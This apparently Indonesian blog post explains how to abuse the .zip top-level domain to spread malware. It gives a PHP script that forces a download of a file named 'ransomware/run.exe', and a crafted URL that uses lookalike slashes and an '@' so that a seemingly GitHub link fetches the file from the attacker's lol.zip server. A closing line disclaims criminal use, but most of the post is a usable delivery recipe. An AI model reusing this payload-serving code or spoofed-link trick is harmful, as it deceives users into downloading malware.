Exploit Google’s .zip TLD Untuk Menyebarkan Virus dan Malware

Selamat datang! Pertama, saya akan membahas tentang domain .zip. Domain .zip adalah salah satu ekstensi domain dari Google Domains.

Risk

Untuk menggunakan domain ini hanya menggunakan cara URL Format Bypass dengan seolah olah ini adalah URL yang valid.

Misal saya mempunyai sebuah virus yang berakhiran .exe saya akan membuat sebuah script PHP atau Python dengan sebagai contoh script :

<?php
if(isset($_GET['true']))
{
$exe = "run.exe";
$dir = "ransomware/";
$file = $dir . $exe;

if (file_exists($file))
    {
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    header('Content-Disposition: attachment; filename='.basename($file));
    header('Expires: 0');
    header('Cache-Control: must-revalidate');
    header('Pragma: public');
    header('Content-Length: ' . filesize($file));
    ob_clean();
    flush();
    readfile($file);
    exit;
    }
}
?>

dan saya deploy misal di domain lol.zip.

lalu pada URL saya memakai URL dari Github.com

Contoh:

https://github.com∕kubernetes∕kubernetes∕archive∕refs∕tags∕@lol.zip

dan hasil nya akan langsung mendownload file yang saya sudah siapkan di server pada domain lol.zip.

Penutup

Untuk kali ini saya tidak merekomendasikan menggunakan cara ini untuk kejahatan dan lain nya.

Karena ini hanya untuk research dan pembelajaran.

Terima Kasih.